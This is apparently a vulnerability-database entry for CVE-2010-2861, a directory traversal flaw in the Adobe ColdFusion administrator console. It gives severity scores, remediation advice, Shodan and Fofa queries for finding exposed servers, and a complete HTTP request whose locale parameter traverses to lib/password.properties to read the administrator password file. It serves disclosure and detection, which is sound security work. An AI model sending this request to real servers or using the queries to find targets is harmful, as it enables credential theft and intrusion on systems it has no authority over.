🔙 목록으로 돌아가기

CVE-2010-2861: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI

TitleAdobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
Authorpikpikcu
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.94233
CVE IDCVE-2010-2861
CWE IDCWE-22
Shodan Queryhttp.component:"Adobe ColdFusion"http.component:"adobe coldfusion"http.title:"coldfusion administrator login"cpe:"cpe:2.3:a:adobe:coldfusion"
Fofa Querytitle="coldfusion administrator login"app="adobe-coldfusion"
Tags cve cve2010 adobe kev vulhub coldfusion lfi vkev vuln

🔍 Vulnerability Description

Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.

🌐 HTTP Request

GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2861.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-2861.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A